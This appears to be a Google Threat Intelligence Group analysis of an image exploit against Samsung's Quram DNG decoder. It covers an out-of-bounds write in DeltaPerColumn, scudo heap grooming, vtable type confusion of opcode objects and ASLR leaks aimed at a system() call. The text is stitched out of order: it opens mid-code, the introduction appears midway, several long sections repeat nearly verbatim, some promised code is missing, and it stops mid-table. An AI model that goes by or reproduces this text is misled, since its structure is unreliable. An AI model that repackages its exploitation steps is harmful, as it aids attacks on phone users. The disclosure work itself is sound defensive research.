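            return self.free.pop()  # immediate reuse (quarantine disabled)
        # Refill with a transfer batch: linear addresses, randomized order.
        batch = [self.next_batch_base + i * 0x40 for i in range(BATCH)]
        self.next_batch_base += BATCH * 0x40
        random.shuffle(batch)
        self.free.extend(batch)
        return self.free.pop()

    def dealloc(self, addr):
        self.free.append(addr)

region = ToyRegion()
first = region.alloc()
# After more than a full batch of intervening allocations, a later
# allocation is guaranteed to come from a later (higher) batch.
for _ in range(2 * BATCH):
    region.alloc()
later = region.alloc()
assert block_size(0x30) == 0x40
assert later > first
```

This is why, in the model as in the exploit, spraying enough same-sized objects lets the attacker rely on a later allocation landing at a higher address than an earlier one, despite the per-batch shuffle.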
Quram’s heap allocations
With a basic understanding of scudo’s allocation behaviour, let’s look at the specific heap allocations Quram makes when decoding a DNG file.
First, when Quram parses the opcode lists in the DNG file, it will allocate one QuramDngOpcode object per opcode. These objects contain the parameters of the opcode, as well as a vtable pointer to the handlers for that opcode. The size of such an object thus depends on the number and type of parameters, and hence on the type of opcode. The size of the different opcodes can be looked up in QuramDngDecoder::makeDngOpcode. For the exploit at hand, only the following opcode sizes are relevant:
DeltaPerColumn (opcode ID 11): 0x50 bytes
MapTable (opcode ID 7): 0x50 bytes
TrimBounds (opcode ID 6): 0x30 bytes
Unknown (starting at opcode ID 14, such as opcode ID 23 in the exploit): 0x30 bytes
This means TrimBounds and Unknown opcodes will land in the same heap region, distinct from the heap region containing the DeltaPerColumn and MapTable opcodes.
Next, for every stage image, Quram will allocate three heap buffers:
A QuramDngImage of fixed size 0x30, which describes the image
A buffer for the pixel values of variable size (depending on width, height and number of planes)
A QuramDngPixelBuffer of fixed size 0x40, which describes the contents of the buffer
These different objects and their relationship are illustrated below:
There are two “pixel buffers” at play here, which can be a bit confusing: the QuramDngPixelBuffer object and the raw buffer with pixel values. In what follows, when we talk about the “raw pixel buffer”, we refer to the latter.
QuramDngImage and QuramDngPixelBuffer will land in different heap regions since they belong to different scudo allocation class sizes. The raw pixel buffer may end up in the same heap region as a QuramDngImage depending on its size. Its size is calculated by ComputeBufferSize. For the dimensions of the stage 3 image of the exploit (width 1 by length 1 with 3 color planes) it will calculate a size of 0x30 bytes (even though 6 bytes would suffice). For the stage 1 and stage 2 images, the sizes are different and will be allocated in a different heap region.
To conclude, the TrimBounds opcodes, the Unknown opcodes, the QuramDngImage objects and potentially the raw pixel buffer will all end up in the same heap region.
Final heap layout
We can now study the sequence of events during DNG decoding to understand the heap layout at the time of the vulnerability trigger:
QuramDngDecoder::getRegionStage1Image will allocate a “stage 1” QuramDngImage (size 0x30)
QuramDngDecoder::readStage1Image parses the 3 opcode lists and allocates a QuramDngOpcode structure per opcode. As we saw, only TrimBounds and Unknown opcodes will land in the heap region of 0x30-byte chunks, which is the one of interest to us. Other opcodes are allocated in different heap regions.
QuramDngDecoder::buildStage2Image will apply opcode list 1. When it is done, the 20000 unknown opcodes it contains are freed.
QuramDngDecoder::doBuildStage2 will allocate a QuramDngImage “stage 2” (size 0x30) and convert stage 1 to stage 2. This stage 2 image will take the spot of the last opcode of opcode list 1 that was freed.
QuramDngDecoder::buildStage2Image can now free the “stage 1” QuramDngImage. It will then process the opcode list 2, and free the 240 “unknown” opcodes.
QuramDngDecoder::doInterpolateStage3 will allocate both a new “stage 3” QuramDngImage (size 0x30) and subsequently a raw pixel buffer of size 0x30. These will take the spots of the last 2 opcodes freed from opcode list 2 in the previous step.
QuramDngDecoder::buildStage3Image can now free the “stage 2” QuramDngImage.
Opcode list 3 gets processed now. In the first TrimBounds opcode, QuramDngOpcodeTrimBounds::doApply will allocate a new raw pixel buffer of size 0x30 (although the replaced raw pixel buffer has the exact same size). This allocation will take the spot of the freed stage 2 image.
Note that the 640 other TrimBounds opcodes have a “minVersion” of 1.4.0.1. This is a trick that will make QuramDngOpcode::aboutToApply bail out early and not have the TrimBounds actually executed. The goal of spraying these 640 TrimBounds opcodes will become clear later.
The eventual heap layout for chunks of size 0x30 is illustrated below. The annotated offsets will be important later on.
Note that because of scudo’s randomization strategy, the allocations of different opcode lists will actually overlap slightly (on the order of 52 allocations), but given enough allocations this effect can be neglected.
Because the allocations have chunk sizes of 0x30 bytes, they take up 0x40 bytes on the heap. Different chunks in this heap region are thus spaced by multiples of 0x40 bytes, which will help us in quickly inferring what parts of an object are being corrupted. The illustration also depicts the sizes the allocations occupy in total, which will be important for understanding the subsequent exploitation flow.
As we’ll see, the exploit will write out of bounds from the raw pixel buffer of stage 3 into the QuramDngImage of stage 3. This explains why the attackers first used a TrimBounds opcode before triggering the bug: it ensures that the raw pixel buffer ends up before the QuramDngImage. Without it, there would be a one-in-two chance that the raw pixel buffer takes a spot after the QuramDngImage.
The initial corruption
After achieving the right heap layout using the TrimBounds, 480 DeltaPerColumn opcodes follow. As a reminder, these are allocated in a different heap region because of a different allocation size. As discussed, DeltaPerColumn opcodes are able to add arbitrary values to arbitrary offsets out of bounds. The attackers add 0x6666 to offsets 10 and 12 within 240 heap objects, starting at offset 0x2800 from the raw pixel buffer and ending at offset 0x6400.
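A quick sanity check of that sweep’s arithmetic (a sketch, assuming blocks spaced 0x40 bytes apart as discussed, with the end offset exclusive, which matches the 240 objects):

```python
BLOCK = 0x40                 # spacing of 0x30-byte chunks on the heap
start, end = 0x2800, 0x6400  # sweep range relative to the raw pixel buffer

# Offsets (relative to the raw pixel buffer) receiving the 0x6666 increment:
targets = [base + field
           for base in range(start, end, BLOCK)
           for field in (10, 12)]

num_objects = (end - start) // BLOCK
assert num_objects == 240          # 240 corrupted heap objects
assert len(targets) == 2 * 240     # two fields touched per object
assert targets[0] == 0x2800 + 10   # first corrupted field
```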
Looking at our heap layout, we will corrupt three types of objects at these offsets:
Unknown and TrimBounds opcodes: opcode structures contain the opcode ID at offset 8 and the specification version at offset 12. Since the opcode IDs will be corrupted, these TrimBounds and Unknown opcodes will simply be skipped later on (which was already the case for the Unknown opcodes).
Most importantly, it will encounter the QuramDngImage object. The two corrupted fields of this object are the “bottom” and “right” fields of the image, which are used in other opcode handlers for verifying if operations are within bounds. This means that we can now use other opcodes, such as MapTable, to perform actions out of bounds.
Under regular circumstances, the “left” and “right” values would be out of bounds and this opcode would not perform any operation. Because we corrupted the dimensions of the QuramDngImage, though, this opcode will operate out of bounds.
Extending the primitives
Incrementing out-of-bounds values by chosen amounts is a powerful primitive, but the exploit also wants to write absolute, arbitrary values out of bounds. The former can be converted into the latter fairly easily, though.
If we have a primitive to write zeros out of bounds, we can combine that with the increment primitive to write arbitrary values in two steps: zero the memory and then increment it with the value we want to write.
Zeroing memory can be done in two ways, and both are used in the exploit:
Using the MapTable opcode with a substitution table of all zeros
Using the DeltaPerColumn opcode. The “Delta” parameter is a float, and -Infinity is supported, which sets the resulting value to 0.
In the exploit, MapTable is only used to zero large regions, likely because of the large space overhead of the MapTable opcode (as it requires a substitution table of 65536 values to be included).
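The two-step conversion can be sketched as follows (a simulation on a plain byte array; the names are ours, and the real exploit performs these steps with MapTable and DeltaPerColumn opcodes on heap memory):

```python
import struct

memory = bytearray(b"\xAA" * 0x40)  # stand-in for out-of-bounds heap memory

def zero16(offset):
    """Zero primitive: a MapTable with an all-zero substitution table,
    or a DeltaPerColumn with a -Infinity delta."""
    memory[offset:offset + 2] = b"\x00\x00"

def add16(offset, delta):
    """Increment primitive: a DeltaPerColumn with a chosen delta."""
    cur = struct.unpack_from("<H", memory, offset)[0]
    struct.pack_into("<H", memory, offset, (cur + delta) & 0xFFFF)

def write16(offset, value):
    """Arbitrary 16-bit write: zero first, then increment by the value."""
    zero16(offset)
    add16(offset, value)

write16(0x10, 0x6666)
assert struct.unpack_from("<H", memory, 0x10)[0] == 0x6666
```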
Crafting a bogus MapTable opcode
With a linear out-of-bounds write primitive in place, the exploit could now:
Write a shell command somewhere out of bounds
Write a JOP gadget chain somewhere out of bounds which ends up calling system()
Overwrite the vtable pointer of one of the opcode objects to be executed to kick off the JOP chain, resulting in a system(<shell command>) execution
There is one important issue though: we don’t know any of the required addresses, since both the heap and the libraries are subject to ASLR. To leak the addresses of the JOP gadgets, the exploit has to do a bit more work.
This opcode will act on offset 5120 x 2 bytes/pixel x 3 colors/pixel = 0x7800 from the raw pixel buffer, which is in the region of those 641 TrimBounds opcodes.
It is corrupting the lower 2 bytes of the vtable pointer of a TrimBounds opcode object. Looking at the substitution table, most values map to themselves, but a few do not. (We had to write an additional script to parse this out, since dng_validate’s output of these long substitution tables is truncated.)
For example, the value 0xecf0 is mapped to 0xed30. Looking at the libimagecodec.quram.so binary, the new address points to the MapTable vtable. This trick allows the attackers to “type confuse” a TrimBounds opcode to a MapTable opcode, by moving the vtable pointer to a different one, without having to leak any ASLR first.
Their substitution table supports different versions of the library, which works because there are not that many versions of the library (the exploit supports 7 versions) and the lower bytes of the vtable do not collide. Moreover, since ASLR is applied at page level granularity, they need to account for every page multiple the vtable can be mapped at. Say we have the following vtable offsets:
libimagecodec.quram.so                   version x    version y
QuramDngOpcodeTrimBounds vtable offset   0x2dccf0     0x2dce10
QuramDngOpcodeMapTable vtable offset     0x2dcd30     0x2dce50
Then the following MapTable substitution table would be constructed (omitting values that don’t matter and can map to whatever):
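As an illustrative sketch (using the hypothetical "version x"/"version y" offsets from above), such a table could be generated like this. Since ASLR is page-granular (0x1000), the low 12 bits of each vtable address are fixed, so one entry is needed per possible value of the top nibble of the lower two vtable bytes:

```python
# Hypothetical per-version vtable offsets, taken from the example table above.
VERSIONS = [
    {"trimbounds": 0x2DCCF0, "maptable": 0x2DCD30},  # "version x"
    {"trimbounds": 0x2DCE10, "maptable": 0x2DCE50},  # "version y"
]

# Start from the identity mapping: values that don't matter map to themselves.
table = list(range(0x10000))

for v in VERSIONS:
    delta = v["maptable"] - v["trimbounds"]
    # ASLR slides the library by whole pages (0x1000), so enumerate all 16
    # possibilities for bits 12-15 of the lower two vtable bytes.
    for page in range(16):
        key = (v["trimbounds"] + page * 0x1000) & 0xFFFF
        table[key] = (key + delta) & 0xFFFF

# Matches the observed entry: 0xecf0 -> 0xed30 ("version x", one page slide).
assert table[0xECF0] == 0xED30
assert table[0x1234] == 0x1234  # untargeted values map to themselves
```

This only works, as noted above, because the lower bytes of the vtables do not collide across the supported library versions.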
Using the previously described arbitrary write primitive, the exploit also corrupts various fields of the TrimBounds object to transform it into a functional bogus MapTable object. Note that a regular MapTable opcode object is bigger than a TrimBounds opcode and would hence also land in a different scudo heap class in normal circumstances. Obviously, the library is unaware and will just read opcode arguments out of bounds in this case.
The constructed bogus MapTable opcode object looks like this:
Before:
00007800: f0fc f8cc 7f00 0000 0600 0000 0100 0401 // TrimBounds opcode X
00007810: 0100 0000 0100 0000 0300 0000 0000 0000
00007820: 0000 0000 0100 0000 0100 0000 0000 0000
00007830: 0301 0300 0000 71ca 0000 0000 0000 0000
00007840: f0fc f8cc 7f00 0000 0600 0000 0100 0401 // TrimBounds opcode Y
After:
00007800: 30fd f8cc 7f00 0000 0600 0000 0000 0401
          |                             |
          |                             '---> will prevent bailout in QuramDngOpcode::aboutToApply
          '---> changed vtable pointer, from TrimBounds to MapTable
00007810: 0100 0000 0100 0000 0300 0000 0000 0000 // Arguments of bogus Maptable,
00007820: 0028 0000 0100 0000 982c 0000 0000 0000 // such as top, left, bottom, right,
00007830: 0100 0000 0100 0000 0100 0000 0000 0000 // plane, planes, ...
00007840: f0fc f8cc 7f00 0000 0600 0000 0100 0401
          '---> vtable of the neighboring TrimBounds opcode, interpreted here
                as the pointer to the MapTable's substitution table
The whole goal of this construction is to have the vtable of another opcode object as the pointer for the MapTable substitution table. If we zero out the memory this MapTable will be applied to beforehand, this will result in a read of two bytes from the TrimBounds vtable, i.e. a leak.
Using the above technique, we can leak values at chosen offsets from the TrimBounds vtable. We demonstrated this for offset 0, but the same idea can be applied to other offsets (the substitution table has 65536 16-bit entries, so entry v leaks the two bytes at offset 2·v from the vtable).
Say you want to leak a pointer at offset 0x1f8 from the TrimBounds vtable. This can be achieved in the following way:
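The following simulation sketches the idea (all names and the leaked value are ours): since entry v of the substitution table holds the two bytes at the table pointer + 2·v, setting a zeroed pixel to 0x1f8 / 2 = 0xfc and applying the bogus MapTable replaces the pixel with the two bytes at offset 0x1f8 from the vtable:

```python
import struct

# Fake "library memory" starting at the TrimBounds vtable; the pointer we
# want to leak sits at offset 0x1f8 (the 0xBEEF value is made up).
vtable_memory = bytearray(0x200)
struct.pack_into("<H", vtable_memory, 0x1F8, 0xBEEF)

def bogus_maptable(pixels, table_memory):
    """Bogus MapTable whose substitution-table pointer aims at the vtable:
    entry v is the 16-bit value stored at table + 2*v."""
    return [struct.unpack_from("<H", table_memory, 2 * v)[0] for v in pixels]

# Zero the target pixel area, then use the increment primitive to set the
# pixel to the table index selecting offset 0x1f8.
pixels = [0x1F8 // 2]  # index 0xfc selects the two bytes at offset 0x1f8

# Applying the bogus MapTable turns the pixel into the leaked bytes.
leaked = bogus_maptable(pixels, vtable_memory)
assert leaked == [0xBEEF]
```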
Again, though, the exploit needs to support different library versions, which have the pointers to leak at different offsets from the vtable. Based on the first leak at offset 0, the exploit can “calculate” the right offsets to leak using another MapTable operation.
In summary the process goes as follows (illustrated below):
Corrupt a TrimBounds opcode into a MapTable object with the substitution table pointing at the TrimBounds vtable.
Have the bogus MapTable opcode process an area of all zeros. The substituted values will be the lower 2 bytes of the first vtable entry (which is the address of QuramDngOpcode::~QuramDngOpcode()). The top nibble will depend on the ASLR slide, and the lower 3 nibbles will be version dependent.
Using MapTable opcodes with well prepared substitution tables (supporting different ASLR slides and library versions), substitute those values to the offset between the TrimBounds vtable and the address of the pointer to leak.
Similar to step 1, corrupt another TrimBounds opcode into a MapTable object with the substitution table pointing at the TrimBounds vtable.
The bogus MapTable will now substitute the offsets from the vtable into their respective values, effectively writing a leaked pointer into memory.
Posted by Benoît Sevens, Google Threat Intelligence Group
Introduction
Between July 2024 and February 2025, six suspicious image files were uploaded to VirusTotal. Thanks to a lead from Meta, these samples came to the attention of the Google Threat Intelligence Group.
Investigation showed that these images were DNG files targeting the Quram library, an image parsing library specific to Samsung devices.
On November 7, 2025, Unit 42 released a blogpost describing how these exploits were used and the spyware they dropped. In this blogpost, we focus on the technical details of how the exploits worked. The exploited Samsung vulnerability was fixed in April 2025.
There has been excellent prior work describing image-based exploits targeting iOS, such as Project Zero’s writeup on FORCEDENTRY. Similar in-the-wild “one-shot” image-based exploits targeting Android have received less public documentation, but that is certainly not for lack of existence. We therefore believe it is an interesting case study to publicly document the technical details of such an exploit on Android.
Attack vector
The VirusTotal submission filenames of several of these exploits indicated that these images were received over WhatsApp:
IMG-20240723-WA0000.jpg
IMG-20240723-WA0001.jpg
IMG-20250120-WA0005.jpg
WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg
The first three filenames follow the naming scheme of WhatsApp on Android. The last filename is how WhatsApp Web names image downloads.
The first two images were received on the same day, based on the filenames, potentially by the same target. Later analysis showed that the first image targets the jemalloc allocator, while the second one targets the scudo allocator, used on more recent Android versions. This blogpost will detail the scudo version of the exploit, as this allocator is more hardened and more relevant for recent devices. The concepts and techniques used in the jemalloc version are similar.
The final payload (as we’ll see later) indicates that the exploit expects to run within the com.samsung.ipservice process. How are WhatsApp and com.samsung.ipservice related and what is this process?
The com.samsung.ipservice process is a Samsung-specific system service responsible for providing "intelligent" or AI-powered features to other Samsung applications. It will periodically scan and parse images and videos in Android’s MediaStore.
When WhatsApp receives and downloads an image, it will insert it in the MediaStore. This means that downloaded WhatsApp images (and videos) can hit image parsing attack surface within the com.samsung.ipservice application.
However, WhatsApp is not intended to automatically download images from untrusted contacts. (WhatsApp on Android’s logic is a bit more nuanced; more details can be found in Brendon Tiszka’s report of a different issue.) This means that, without additional bypasses, and assuming the image is sent by an untrusted contact, a target would have to click the image to trigger the download and have it added to the MediaStore, making this in fact a “1-click” exploit. We have no knowledge or evidence of the attackers using such a bypass, though.
A curious image
Before we delve into the exploit, let’s gather an understanding of what type of file we are looking at.
Opcode List 3 : TrimBounds, DeltaPerColumn, DeltaPerColumn, DeltaPerColumn, ...
Subfile Type : Full-resolution image
Strip Offsets : 6596794
Strip Byte Counts : 1
...
(We truncated the “Opcode List” lines, since they contained thousands of opcodes in the actual exiftool output.)
Although the image was saved with a jpeg extension, this image is in fact a Digital Negative (DNG) image. According to Wikipedia:
Digital Negative (DNG) is an open source, lossless, well defined camera RAW data container with the goal to replace a range of proprietary, closed source raw image containers. It has been developed by Adobe.
…
DNG is based on the TIFF/EP standard format, and mandates significant use of metadata. The specification of the file format is open and not subject to any intellectual property restrictions or patents.
The image width and height look suspiciously small. And what are these opcode lists?
Some DNG format basics
The DNG format specification can be found on Adobe’s website.
DNG files use SubIFD trees, as described in the TIFF-EP specification, in order to contain multiple versions of the same image, such as a preview and a main image. This DNG file has 3 SubIFDs:
Type “Preview Image” with width 1 and length 1
Type “Main Image” with width 16 and length 16
Type “Main Image” with width 1 and length 1
As we already briefly mentioned, the sizes of these images are obviously very suspicious, as is the fact that there are two “Main Image” types. We have not figured out what the purpose of the second main image is (if any).
DNG images can contain 3 “opcode lists”. As it will turn out, these “opcodes” will be very important in the context of this exploit. Their goal is to offload some processing steps from the camera to the DNG reader. Their intended use case is for example to perform lens corrections. The reason there are 3 opcode lists is because they are intended to be applied at different moments during the DNG decoding:
The raw image bytes are read from the DNG file, a.k.a. the “stage 1” image
Opcode list 1 specifies the list of opcodes that should be applied to the stage 1 image
The DNG decoder maps the raw image bytes to linear reference values, which results in a “stage 2” image.
Opcode list 2 specifies the list of opcodes that should be applied to the stage 2 image
The DNG decoder performs demosaicing of the linear reference values, which results in a “stage 3” image.
Opcode list 3 specifies the list of opcodes that should be applied to the stage 3 image.
Every opcode has an opcode ID and a varying number and type of parameters. The latest specification (1.7.1.0 from September 2023) contains 14 distinct opcodes, with opcode IDs going from 1 to 14. Below is an example of an opcode description found in the specification:
For this exploit, only 3 opcodes will be of interest:
TrimBounds (opcode ID 6): This opcode trims the image to a specified rectangle.
MapTable (opcode ID 7): This opcode maps a specified area and plane range of an image through a 16-bit lookup table.
DeltaPerColumn (opcode ID 11): This opcode applies a per-column delta (constant offset) to a specified area and plane range of an image.
DeltaPerColumn and MapTable perform transformations on areas (defined by a top, left, bottom and right parameter) and plane ranges (defined by a first plane and number of planes parameter).
Looking at the opcode lists in the exiftool output above, we already notice some suspicious things:
They use opcodes with opcode ID 23 (which exiftool cannot map to an opcode name).
Typical benign DNG images will contain only a handful of opcodes, while for this image we have thousands of opcodes in the opcode lists.
Quram
As we mentioned before, the process targeted by the payload is the Samsung-specific com.samsung.ipservice. The next question then becomes which code in this application performs the DNG decoding.
Looking at a decompiled com.samsung.ipservice APK (which on our test phone was located at /system/priv-app/IPService/IPService.apk), we can see that when the application parses a file with an extension of "jpg", "jpeg", "JPG" or "JPEG", it will call into the Java method com.quramsoft.images.QrBitmapFactory.decodeFile (bundled in the same APK).
Bitmap decodeFile2 = QuramDngBitmap.decodeFile(str, options); // [2]; calls into Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI
if (options.outWidth <= 0) {
    if (options.outHeight <= 0) {
        return decodeFile2;
    }
}
options.outMimeType = "image/dng";
return decodeFile2;
} catch (IOException e2) {
    e2.printStackTrace();
    return null;
}
}
The "Quram library" is a set of proprietary, closed-source software libraries used by Samsung on its Android devices. Its primary function is to process, parse, and decode various image formats. The library is not developed by Samsung itself. It is created by a third-party software vendor named Quramsoft. Mateusz Jurczyk already wrote about this library in 2020.
The QrBitmapFactory.decodeFile method will first try to decode the image using QuramBitmapFactory.decodeFile (see [1]), which calls the exported Java_com_quramsoft_images_QuramBitmapFactory_nativeDecodeFile2 function of the native library libimagecodec.quram.so. This function handles formats such as PNG, JPEG and GIF, but not DNG. This native library is not part of the IPService APK but rather located at /system/lib64/libimagecodec.quram.so.
When QuramBitmapFactory.decodeFile fails, QrBitmapFactory.decodeFile calls QuramDngBitmap.decodeFile as a fallback (see [2]), which then calls Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI. This function performs the complete DNG decoding, and it is within this code path that the vulnerability is triggered and the exploit fully executes.
A few tools came in handy when analysing this exploit, which we’ll describe next.
First of all, on the static analysis side, we need an overview of the different opcodes that are called with their parameters. exiftool only gives us a list of the (translated) opcode IDs. To inspect every opcode with its parameters, we can use the dng_validate tool provided by Adobe’s DNG SDK with the -v flag. It will parse the opcode lists and we can post-process its textual output to make sense of the thousands of opcodes. Here is a snippet of what the output looks like, showing us the different parameters of a few TrimBounds and DeltaPerColumn opcodes.
On the dynamic analysis side, debugging com.samsung.ipservice would be very annoying, since it only runs periodically (although there are tricks to force start it). For easier debugging, we reused @flankerhqd’s fuzzing harness (in part based on Project Zero’s SkCodecFuzzer), which loads a DNG file provided as a filename into a buffer and passes it to libimagecodec.quram.so’s QrDecodeDNGPreview. We compile it as a standalone binary and can run it under a debugger.
It is noteworthy that QrDecodeDNGPreview (used in our harness) is not the export called by com.samsung.ipservice (which ends up calling QuramDngDecoder::decode). However, if there is no preview image available with one of the JPEG compression types, QrDecodeDNGPreview will call QuramDngDecoder::decodePreview, which will also perform a full DNG decoding and successfully triggers the vulnerability and exploit.
Our test phone was a Samsung Galaxy S21 5G (SM-G991B) running firmware version G991BXXSAFXCL, which has a security patch level of 2024-04-01.
The bug
Using the dng_validate tool we can make a listing of the sequence of opcodes called and their number of repetitions:
The specification mentions that if the flag bit is set (which it is), opcodes with unknown opcode IDs should be skipped. So let’s for the moment ignore the “Unknown” opcodes with ID 23 (more on them later).
Let’s look at the first 2 known opcodes, which occur in opcode list 3:
$ grep -A8 TrimBounds dng_validate.out | head -n 8
The DNG opcode parameters are embedded directly in the file. DeltaPerColumn takes a list of deltas to be applied to each pixel and the "Area Spec" to work over: top, left, bottom and right coordinates, the first plane and total number of planes being targeted, and the row and column pitch (rowPitch and colPitch). These values are controllable by the attacker.
The “first plane” (5125) and “number of planes” (5123) parameters of the DeltaPerColumn opcode are very suspicious. At stage 3 of the DNG decoding, the number of planes will be 3 (R, G and B), as can be seen in the CFA related data of the exiftool output. Since the planes are numbered 0 to 2, these values are clearly out of bounds.
Let’s have a look at QuramDngOpcodeDeltaPerColumn::processArea, which is the handler for the DeltaPerColumn opcode. Below are the relevant lines of that function for the vulnerability. (Variable names are chosen by us, since this is a closed-source library.)
The function takes a few objects with Quram specific structure as arguments. The QuramDngImage describes the image on which the opcode is to be applied (which is the stage 3 image at this point). The QuramDngOpcode contains the DeltaPerColumn parameters. The function has a triple nested loop to iterate over the width, length and planes of the area. For every such triplet (width,length,plane) it calculates the offset in the raw pixel buffer and adds a delta to it. Only the plane loop is relevant for the bug and displayed in the code above.
Below is an example of a 6x6 image with its different color planes and to what offsets the pixel values map in the raw pixel buffer. During stage 2 and stage 3 image processing, each pixel value in each color plane takes 16 bits.
There are two issues in that handler function:
opcode_last_plane is calculated incorrectly: it should be opcode_first_plane + opcode_number_of_planes (as is the case in the patched version). This by itself is a correctness issue (and a pretty basic one that would be expected to surface under normal usage or testing of the library).
The plane used in the offset calculation is bounded by opcode_last_plane, but at no point is it checked that opcode_last_plane is within the number of planes that the image contains.
The actual values from the exploit are annotated as comments in the code snippet. With these values, the plane loop will be executed exactly once. The width and length loops will also be executed only once, since t=0, l=0, b=1, r=1. This means exactly one write will happen. Since the stage 3 image in the exploit has width 1 and length 1, the write will happen at offset 5125 x 2 = 10250 from the raw pixel buffer.
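The offset arithmetic for that single write can be double-checked with a small sketch. (For a 1x1 image, planar and interleaved pixel layouts yield the same offset, so the exact layout does not matter here.)

```python
BYTES_PER_PIXEL_VALUE = 2   # stage 2/3 pixel values are 16-bit

width, length = 1, 1        # dimensions of the stage 3 image in the exploit
row, col = 0, 0             # the single pixel covered by t=0, l=0, b=1, r=1
plane = 5125                # out-of-bounds "first plane" from the opcode

# Planar layout: all values of plane 0, then plane 1, etc.
offset = (plane * width * length + row * width + col) * BYTES_PER_PIXEL_VALUE
assert offset == 10250      # i.e. 0x280a bytes past the raw pixel buffer
```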
The eventual heap layout for chunks of size 0x30 is illustrated below. The annotated offsets will be important later on.
Note that because of scudo’s randomization strategy, the allocations of different opcode lists will actually overlap slightly (on the order of 52 allocations), but given enough allocations this effect can be neglected.
Because the allocations have chunk sizes of 0x30 bytes, they take up 0x40 bytes on the heap. Different chunks in this heap region are thus spaced by multiples of 0x40 bytes, which helps us quickly infer which parts of an object are being corrupted. The illustration also depicts the total sizes the allocations occupy, which will be important for understanding the subsequent exploitation flow.
As we’ll see, the exploit will write out of bounds from the raw pixel buffer of stage 3 into the QuramDngImage of stage 3. This explains why the attackers first used a TrimBounds opcode before triggering the bug: it ensures that the raw pixel buffer ends up before the QuramDngImage. Without it, there would be a one-in-two chance that the raw pixel buffer takes a spot after the QuramDngImage.
The initial corruption
After achieving the right heap layout using the TrimBounds, 480 DeltaPerColumn opcodes follow. As a reminder, these are allocated in a different heap region because of a different allocation size. As discussed, DeltaPerColumn opcodes are able to add arbitrary values to arbitrary offsets out of bounds. The attackers add 0x6666 to offsets 10 and 12 within 240 heap objects, starting at offset 0x2800 from the raw pixel buffer and ending at offset 0x6400.
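A quick sanity check on the arithmetic: with chunks spaced 0x40 bytes apart (the extra 0x10 per 0x30-byte chunk is inferred from the layout described above), the corruption span from +0x2800 to +0x6400 covers exactly the 240 objects the exploit targets:

```python
# Chunks of user size 0x30 are spaced 0x40 bytes apart in this region
# (the extra 0x10 per chunk is inferred from the article's layout).
CHUNK_STRIDE = 0x40
object_bases = list(range(0x2800, 0x6400, CHUNK_STRIDE))
print(len(object_bases))  # 240 objects corrupted

# Within each object, 0x6666 is added at byte offsets 10 and 12:
write_targets = [(base + 10, base + 12) for base in object_bases]
```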
Looking at our heap layout, we will corrupt three types of objects at these offsets:
Unknown and TrimBounds opcodes: opcode structures contain the opcode ID at offset 8 and the specification version at offset 12. Since the opcode IDs will be corrupted, these TrimBounds and Unknown opcodes will simply be skipped later on (which was already the case for the Unknown opcodes).
QuramDngImage: most importantly, the writes hit the QuramDngImage object. The two corrupted fields are its “bottom” and “right” fields, which other opcode handlers use to verify that operations are within bounds. This means we can now use other opcodes, such as MapTable, to perform actions out of bounds.
If we look for example at the first MapTable that follows, it looks like:
Opcode:MapTable,minVersion=1.4.0.0,flags=1
AreaSpec:t=0,l=5120,b=1,r=5121,p=0:1,rp=1,cp=1
Count:65536
Under regular circumstances, the “left” and “right” value would be out of bounds and this opcode would not perform any operation. Because we corrupted the dimensions of the QuramDngImage though, this opcode will operate out of bounds.
Extending the primitives
Incrementing arbitrary out-of-bounds values by chosen amounts is a powerful primitive, but the exploit also wants to write absolute arbitrary values out of bounds. The increment primitive can be converted into an absolute write fairly easily though.
If we have a primitive to write zeros out of bounds, we can combine that with the increment primitive to write arbitrary values in two steps: zero the memory and then increment it with the value we want to write.
Zeroing memory can be done in two ways, and both are used in the exploit:
Using the MapTable opcode with a substitution table of all zeros
Using the DeltaPerColumn opcode. The “Delta” parameter is a float, and -Infinity is supported, which sets the resulting value to 0.
In the exploit, MapTable is only used to zero large regions, likely because of the large space overhead of the MapTable opcode (as it requires a substitution table of 65536 values to be included).
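The two-step conversion can be sketched as follows. The saturation of regular deltas into [0, 0xffff] is an assumption about the decoder; the article only states that a -Infinity delta yields 0:

```python
import math

# Sketch of combining the two primitives into an absolute write.
# Saturation into [0, 0xffff] for regular deltas is an assumption.

def delta_per_column(value, delta):
    """Model of DeltaPerColumn applied to one 16-bit sample."""
    if math.isinf(delta) and delta < 0:
        return 0  # -Infinity zeroes the value
    return max(0, min(0xffff, int(value + delta)))

def write_absolute(old_value, wanted):
    zeroed = delta_per_column(old_value, float("-inf"))  # step 1: zero
    return delta_per_column(zeroed, wanted)              # step 2: increment

print(hex(write_absolute(0xbeef, 0x1234)))  # -> 0x1234
```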
Crafting a bogus MapTable opcode
With a linear out-of-bounds write primitive in place, the exploit could now:
Write a shell command somewhere out of bounds
Write a JOP gadget chain somewhere out of bounds which ends up calling system()
Overwrite the vtable pointer of one of the opcode objects to be executed to kick off the JOP chain, resulting in a system(<shell command>) execution
There is one important issue though: we don’t know any of the required addresses, since both the heap and the libraries are subject to ASLR. To leak the addresses of the JOP gadgets, the exploit has to do a bit more work.
Let’s show the first MapTable opcode again:
Opcode:MapTable,minVersion=1.4.0.0,flags=1
AreaSpec:t=0,l=5120,b=1,r=5121,p=0:1,rp=1,cp=1
Count:65536
This opcode will act on offset 5120 x 2 bytes/pixel x 3 colors/pixel = 0x7800 from the raw pixel buffer, which is in the region of those 641 TrimBounds opcodes.
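The offset arithmetic can be checked with a one-liner, using the 2 bytes per sample and 3 color planes stated above:

```python
# Checking the AreaSpec-to-byte-offset arithmetic.
BYTES_PER_SAMPLE = 2
COLOR_PLANES = 3

def left_to_byte_offset(left):
    return left * BYTES_PER_SAMPLE * COLOR_PLANES

print(hex(left_to_byte_offset(5120)))  # l=5120 -> 0x7800
```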
This opcode is corrupting the lower 2 bytes of the vtable pointer of a TrimBounds opcode object. Looking at the substitution table, most values map to themselves, but a few do not. (We had to write an additional script to parse this out, since dng_validate’s output of these long substitution tables is truncated.)
For example, the value 0xecf0 is mapped to 0xed30. Looking at the libimagecodec.quram.so binary, the new address points to the MapTable vtable. This trick allows the attackers to “type confuse” a TrimBounds opcode to a MapTable opcode, by moving the vtable pointer to a different one, without having to leak any ASLR first.
Their substitution table supports different versions of the library. This works because there are not that many versions (the exploit supports 7) and the lower bytes of the vtables do not collide. Moreover, since ASLR is applied at page-level granularity, only the lower 12 bits of an address are fixed, so they need to account for every page multiple the vtable can be mapped at within the 16-bit window. Say we have the following vtable offsets:
                                        libimagecodec.quram.so
                                        version x    version y
QuramDngOpcodeTrimBounds vtable offset  0x2dccf0     0x2dce10
